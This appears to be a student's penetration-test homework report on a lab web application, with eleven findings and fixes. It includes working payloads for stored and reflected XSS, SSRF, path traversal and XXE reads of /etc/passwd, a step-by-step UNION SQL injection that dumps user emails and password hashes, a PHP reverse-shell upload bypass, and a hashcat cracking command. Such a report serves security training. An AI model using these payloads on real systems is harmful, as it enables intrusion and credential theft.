EHA-HW1 berbejan

Vulnerability Report

Table of Contents

Finding 1: Stored XSS Vulnerability (MEDIUM)

  • Category: Stored Cross-Site Scripting (XSS)

  • Severity: Medium

  • Location: http://[IP OF SERVER]/chat

  • Description:

    • Steps to Reproduce:
      1. Insert the following string <img src onerror=alert(1)> in the message box in the http://[IP OF SERVER]/chat.
      2. Javascript alert will popup every time untill the message is deleted.
    • Proof of Concept:
      1

      <img src onerror=alert(1)>

  • Impact:

    • The stored XSS vulnerability allows attackers to inject malicious scripts into the application, potentially leading to session hijacking, data theft etc.
    • In this case, an attacker can execute arbitrary JavaScript code in the context of other users accessing the chat. So anyone who will just open chat tab will be afected.

  • Recommendation:

CVSS Score: 5.4 (Medium) CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)

Finding 2: Reflected XSS Vulnerability (MEDIUM)

  • Category: Reflected Cross-Site Scripting (XSS)

  • Severity: Medium

  • Location: http://[IP OF SERVER]/login?redirect=

  • Description:

    • Proof of Concept:
      http://[IP OF SERVER]/login?redirect="><script%3Ealert(1)</script>

  • Impact:

    • The reflected XSS vulnerability allows attackers to inject malicious scripts into the application, potentially leading to session hijacking, data theft, or defacement.
    • In this case, an attacker can induce users to deliver XSS attack. For example by clicking on crafted malicious link, or placing links on attackers website.

  • Recommendation:

CVSS Score: 5.4 (Medium) CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)

Finding 3: Server-Side Request Forgery (SSRF) Vulnerability (HIGH)

  • Category: Server-Side Request Forgery (SSRF)

  • Severity: High

  • Location: http://[IP OF SERVER]/api/load?resource=

  • Description:

    • Proof of Concept:
      1
2
3
4
5
6
7
8
9

      GET /api/load?resource=http://localhost HTTP/1.1
Host: [IP OF SERVER]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://[IP OF SERVER]/blog
Connection: close
Cookie: laravel_session=[your laravel_session cookie value]

  • Impact:

    • The SSRF vulnerability allows attackers to make arbitrary requests on behalf of the server, potentially leading to data exposure, server-side attacks, or access to internal services.
    • In this case, an attacker can exploit the vulnerability to access private local server.

  • Recommendation:

CVSS Score: 8.6 (High) CWE-918: Server-Side Request Forgery (SSRF)

Finding 4: Authorization Vulnerability Allowing File Listing (MEDIUM)

  • Category: Authorization Bypass

  • Severity: Medium

  • Location: http://[IP OF SERVER]/api/gallery

  • Description:

    • Steps to Reproduce:
      1. Craft the path you want by replacing /etc/passwd by your path and send the request.
      2. Decode response with base64
    • Proof of Concept:
       1
 2
 3
 4
 5
 6
 7
 8
 9
10

      GET /api/gallery/..//..//..///..////..///..///etc/passwd HTTP/1.1
Host: [IP OF SERVER]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://[IP OF SERVER]/gallery
Connection: close
Cookie: laravel_session=[your laravel_session cookie value]
Upgrade-Insecure-Requests: 1

  • Impact:

    • The authorization vulnerability allows normal app users to list sensitive files on the server, exposing confidential information or facilitating further attacks.
    • In this case, an attacker can enumerate system files and gather information about the server’s configuration and directory structure. For example /etc/passwd in this scenario.

  • Recommendation:

    • Implement proper access controls to restrict unauthorized access to sensitive endpoints and files.
    • Ensure that file listing functionality is properly restricted to authorized users only.
    • Implement proper filter for path traversal attacks and restrict access to server files.
    • Avoid passing user input to filesystem api.
    • PortSwigger prevention, Snyk prevention

CVSS Score: 5.4 (Medium) CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

Finding 5: SQL Injection Vulnerability Allowing Database Enumeration And Data Leak (CRITICAL)

  • Category: SQL Injection

  • Severity: Critical

  • Location: http://[IP OF SERVER]/api/chat

  • Description:

    • Proof of Concept: I know that in normal bussines enviroment, this exploit would be too much since i dont want to get everything from customers database. But this was a good training in homework This set of payloads will enumerate whole database. Leading to listing all user data etc. In this very example i will get all users email and password(hashed) which can later be decrypted.

      1. Enumerating column count in current table to continue with other attacks. Order by 6 is first number from 1 that throws internal server error. This shows that current table has 5 columns
      1
2
3
4
5
6
7
8
9

      GET /api/chat/1%20order%20by%206# HTTP/1.1 
Host: [IP OF SERVER]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: laravel_session=[your laravel_session cookie value]; 
Upgrade-Insecure-Requests: 1
      1. After that we can use union statements with selects. Firstly we need to know the name of database now running. In our case the name is laravel.
      1
2
3
4
5
6
7
8
9

      GET /api/chat/1%20union%20select%201,2,3,4,database()# HTTP/1.1 
Host: [IP OF SERVER]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: laravel_session=[your laravel_session cookie value]; 
Upgrade-Insecure-Requests: 1
      1. With database name we can see name of every table in this database. We will now focus on table users
      1
2
3
4
5
6
7
8
9

      GET /api/chat/1%20union%20select%201,2,3,4,group_concat(0x7c,table_name,0x7C)%20from%20information_schema.tables%20wheRe%20table_schema='laravel'# HTTP/1.1 
Host: [IP OF SERVER]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: laravel_session=[your laravel_session cookie value]; 
Upgrade-Insecure-Requests: 1
      1. With table names you can enumerate column names in tables. In this payload we focus on email and password columns
      1
2
3
4
5
6
7
8
9

      GET /api/chat/1%20union%20select%201,2,3,4,gRoUp_cOncaT(0x7c,column_name,0x7c)%20fRoM%20information_schema.columns%20where%20table_name='users'# HTTP/1.1 
Host: [IP OF SERVER]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: laravel_session=[your laravel_session cookie value]; 
Upgrade-Insecure-Requests: 1
      1. You can list any data you want from table
      1
2
3
4
5
6
7
8
9

      GET /api/chat/1%20union%20select%201,2,3,4,gRoUp_cOncaT(0x7c,email,0x7c,password,0x7c)%20fRoM%20users# HTTP/1.1 
Host: [IP OF SERVER]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: laravel_session=[your laravel_session cookie value]; 
Upgrade-Insecure-Requests: 1

  • Impact:

    • The SQL injection vulnerability allows attackers to execute arbitrary SQL queries on the application’s database through api, leading to data exfiltration.
    • In this case, an attacker can enumerate database contents, such as table contents, including user data, allowing further exploitation.

  • Recommendation:

CVSS Score: 9.8 (Critical) CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)

Finding 6: XML External Entity (XXE) Vulnerability Allowing File Access (HIGH)

  • Category: XML External Entity (XXE)

  • Severity: High

  • Location: http://[IP OF SERVER]/api/calculator

  • Description:

    • Proof of Concept:

       1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19

      POST /api/calculator HTTP/1.1
Host: [IP OF SERVER]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://[IP OF SERVER]/calculator
Content-Type: application/xml
Origin: http://[IP OF SERVER]
Content-Length: [length]
Connection: close
Cookie: laravel_session=[your laravel_session cookie value]

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<bmi>
    <height>&xxe;</height>
    <weight>80</weight>
</bmi>

      or

      1
2
3
4
5
6

      <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM ""php://filter/convert.base64-encode/resource=/etc/passwd""> ]>
<bmi>
    <height>&xxe;</height>
    <weight>80</weight>
</bmi>

      and decode response in base64

  • Impact:

    • The XXE vulnerability allows attackers to read arbitrary files on the server’s filesystem, potentially exposing sensitive information or facilitating further attacks.
    • In this case, an attacker can access system files, such as /etc/passwd, which may contain user credentials or other sensitive data, leading to further compromise.
    • We are even able to find database login and password in plain text. The password is same as admin one as we discuss in bonus finding.

  • Recommendation:

    • Disable external entity parsing or use safe XML processing libraries that mitigate XXE vulnerabilities.
    • Implement proper input validation and sanitization to prevent XML injection attacks.
    • PortSwigger XXE prevention, OWASP cheatsheet

CVSS Score: 7.2 (High) CWE-611: Improper Restriction of XML External Entity Reference

Finding 7: File Upload Vulnerability Allowing Unrestricted File Upload (HIGH/CRITICAL)

  • Category: File Upload Vulnerability

  • Severity: High/Critical

  • Location: http://[IP OF SERVER]/api/gallery (POST)

  • Description:

    • Proof of Concept: Just change extension to image/jpg and you are able to upload almost every file. Some extension are filtered by server eg. .php but php5 is perfectly fine as any other.

       1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

      POST /api/gallery HTTP/1.1
Host: [IP OF SERVER>]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://[IP OF SERVER>]/gallery
Content-Type: multipart/form-data; boundary=---------------------------292047434216616372382482965518
Origin: http://[IP OF SERVER>]
Content-Length: 5720
Connection: close
Cookie: laravel_session=fnyDCf

-----------------------------292047434216616372382482965518
Content-Disposition: form-data; name="photo"; filename="shell.php5"
Content-Type: image/jpeg

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
(...)
?>
      1. Click upload button and upload your file. Modify it to have .jpg ending or send the request directly to api

      1. Intercept request with eg. BurpSuite

      2. Change Content-Type value to image/jpeg and remove .jpg ending and add your desired which wont get filtered by server

      3. Send the request

      1. File is succesfully uploaded on server (decoded with base64 we get the shell.php5 file) its also possible to name the file ../../../../something to be able to path traversal and upload it to eg. /var/www/laravel/storage/app instead of /var/www/laravel/storage/app/gallery. You can make little manipulation with place where file is stored.

  • Impact:

    • The file upload vulnerability allows attacker to upload malicious files on the server, potentially leading to remote code execution or reverse shell.
    • In this case, an attacker can upload a PHP shell script and possibly gain unauthorized access to the server, execute commands, and manipulate files.
    • In case of this web app i wasn’t able to run the files. But you can see location of file after upload and if attacker will be able to actually run the files it can lead to several problems mentioned above. This can be achieved when the webapp gets updated and the new feature could be vulnerable to running local scripts or files.

  • Recommendation:

    • Implement strict validation checks on file uploads, including file type verification and content scanning for malicious payloads.
    • Store uploaded files in a separate, non-executable directory with restricted permissions to prevent direct execution.
    • OWASP file upload prevention, PortSwigger prevention

CVSS Score: 8.6 (High) CWE-434: Unrestricted Upload of File with Dangerous Type

Finding 8: Lack of Password Complexity Requirements (LOW)

  • Category: Authentication
  • Severity: Low
  • Location: http://[IP OF SERVER]/register
  • Description:

    • Observation:

      • The application does not enforce password complexity requirements such as character types (e.g., uppercase, lowercase, special characters), or password expiration. Only minimal length of 8

    • Impact:

      • Lack of password complexity requirements increases the likelihood of weak passwords being used by users, which can lead to easier brute-force attacks, credential stuffing, or password guessing.
      • This can be showcased by wordlist attack against hash of customer aquired in SQLi attack.

    • Proof of concept:

      marisa.raynold@localhost has hash of password: $2y$10$tsvphy17y4w4RvQ3hk\/Q\/OUI4iHvoLPS\/An1qrJwyX0Ykse06eDrK by running: hashcat -m 3200 -a 0 \$2y\$10\$tsvphy17y4w4RvQ3hk\/Q\/OUI4iHvoLPS\/An1qrJwyX0Ykse06eDrK rockyou.txt we get the password in the matter of seconds -> pokemon.

    • Recommendation:

      • Implement a password policy that includes requirements for character complexity, password complexity and regular password expiration to enhance the security of user accounts.
      • Educate users about the importance of choosing strong passwords and provide guidance on creating secure passwords.
      • OWASP authentication cheatsheet including password complexity

CVSS Score: 3.1 (Low) CWE-521: Weak Password Requirements

Finding 9: Session Fixation Vulnerability (MEDIUM)

  • Category: Session Management
  • Severity: Medium
  • Location: http://[IP OF SERVER]/login
  • Description:

    • Proof of Concept:

      • An attacker can perform a session fixation attack by forcing a user to use a specific session identifier, typically by providing them with a valid session ID.
      • After the user logs in using the provided session ID, the attacker can hijack the session and gain unauthorized access to the user’s account.

    • Impact:

      • The vulnerability allows attackers to hijack user sessions, potentially gaining unauthorized access to sensitive information, performing actions on behalf of the user, or conducting further attacks.

    • Proof of Concept:

      1. Attacker generates own session by logging in.
      1. User logs in with cookie laravel_session set to value of atacker.
      1. After login of victim attacker refresh and has full session of user.

    • Recommendation:

      • Implement secure session management practices, including session token regeneration upon authentication, session expiration, and secure transmission of session identifiers.
      • Use random, unpredictable session identifiers to prevent fixation attacks and ensure the uniqueness of session tokens for each user session.
      • AppSec monkey prevention blog, University of Toronto prevention tips

CVSS Score: 5.8 (Medium) CWE-384: Session Fixation

Finding 10: Vulnerability Allowing Dictionary/Brute Force Attack with Delay (HIGH)

  • Category: Authentication
  • Severity: High
  • Location: http://[IP OF SERVER]/login
  • Description:

    • Exploit:

      • An attacker can conduct a dictionary or brute force attack against the login page by sending login requests with different username/password combinations.
      • By incorporating a 15-second delay between login attempts, the attacker can evade rate-limiting mechanisms and bypass account lockout protections.
      • Additionally, the attacker can differentiate successful login attempts from failed ones by analyzing variations in the application’s responses.

    • Proof of Concept Here you can see succesfull test with BurpSuite Intruder. As i told in exploit section, here you can see difference between succesfull login and failed login. This is what i use to enumerate state of login in intruder. Left succesfull and right is failed response(includes /login?redirect=s).

    • Impact:

      • The vulnerability enables attackers to systematically guess credentials, potentially leading to unauthorized access to user accounts, data breaches, or further compromise of the system.

    • Recommendation:

      • Implement effective rate-limiting mechanisms to prevent excessive login attempts and enforce account lockout policies.
      • Use CAPTCHA challenges or multi-factor authentication (MFA) to add an additional layer of security against automated attacks.
      • Monitor login attempts for suspicious patterns and implement anomaly detection mechanisms to identify and mitigate brute force attacks.
      • OWASP authentication cheatsheet including password complexity

CVSS Score: 8.5 (High) CWE-307: Improper Restriction of Excessive Authentication Attempts

Finding 11: Admin Password Leakage in Configuration Files

  • Category: Configuration Management
  • Severity: High
  • Location: Filesystem - Configuration Files
  • Description:

    • Observation:

      • The application’s configuration file located at /var/www/laravel/.env contains sensitive information, including the password to the database, in plaintext format. This is configuration file for laravel server.
      • Unfortunately admin account with admin@localhost email uses exact same password.

    • Proof of Concept

      1. We just need to access /var/www/laravel/.env file with any vulnerability (XXE, Path Traversal etc.). Here we can see DB_PASSWORD used also for admin account. There is possibility to obtain admin account through session fixation.

      2. We can login as admin with email admin@localhost, which is disclosed in chat.

    • Impact:

      • The presence of plaintext passwords in configuration files poses a significant security risk, allowing attackers to obtain sensitive credentials and potentially gain unauthorized access to critical systems or accounts. In this case to Admin account.

    • Recommendation:

      • Encrypt or hash sensitive credentials stored in configuration files to prevent plaintext exposure.
      • Restrict access permissions to configuration files to authorized personnel only.
      • Implement secure storage practices and consider using a secrets management solution to store and manage sensitive information securely.

CVSS Score: 9.8 (Critical) CWE-312: Cleartext Storage of Sensitive Information in a Resource